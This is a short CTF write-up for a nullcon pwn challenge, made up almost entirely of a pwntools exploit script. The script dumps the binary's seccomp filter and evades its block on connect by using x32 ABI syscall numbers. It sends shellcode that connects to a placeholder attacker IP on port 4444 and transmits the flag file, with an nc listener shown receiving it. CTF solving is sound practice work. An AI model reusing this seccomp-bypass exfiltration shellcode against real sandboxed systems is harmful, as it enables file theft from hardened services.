by disconnect3d from justCatTheFish; the script below should be self-explanatory.

```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template '--host=pwn4.ctf.nullcon.net' '--port=5003' ./chall
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./chall')

# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or 'pwn4.ctf.nullcon.net'
port = int(args.PORT or 5003)

def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io

def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
continue
'''.format(**locals())

#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: amd64-64-little
# RELRO: Full RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled

'''
dc@ubuntu:~/nullcon/pwn_sleekboi$ seccomp-tools dump ./chall
asd
line CODE JT JF K
=================================
0000: 0x20 0x00 0x00 0x00000004 A = arch
0001: 0x15 0x00 0x08 0xc000003e if (A != ARCH_X86_64) goto 0010
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x15 0x06 0x00 0x0000003b if (A == execve) goto 0010
0004: 0x15 0x05 0x00 0x00000142 if (A == execveat) goto 0010
0005: 0x15 0x04 0x00 0x0000002a if (A == connect) goto 0010
0006: 0x15 0x03 0x00 0x00000031 if (A == bind) goto 0010
0007: 0x15 0x02 0x00 0x0000002b if (A == accept) goto 0010
0008: 0x15 0x01 0x00 0x00000120 if (A == accept4) goto 0010
0009: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0010: 0x06 0x00 0x00 0x00051234 return ERRNO(4660)
'''

# ^-- we can't connect but we can x32 abi syscalls via SYS_connect|0x40000000 syscall numbers

p = start()
host, port = 'XXX.XXX.XXX.XXX', 4444
# We replace SYS_connect to use x32 ABI syscalls --- which the used seccomp policy doesn't block
connect = shellcraft.amd64.connect(host, port).replace('SYS_connect', 'SYS_connect|0x40000000')
# Note: connect from pwntools leave the sockfd in 'rbp' so we use it below
catflag = shellcraft.amd64.cat(filename='flag', fd='rbp')

payload = asm(connect + catflag, arch='amd64')
write('payload', payload)

p.sendline(payload)
# $ nc -vvv -l -p 4444
# Listening on [0.0.0.0] (family 0, port 4444)
# Connection from XXX.XX.XXX.XX 35450 received!
# hackim20{OMG_The_first_one_was_unintended}

p.interactive()
```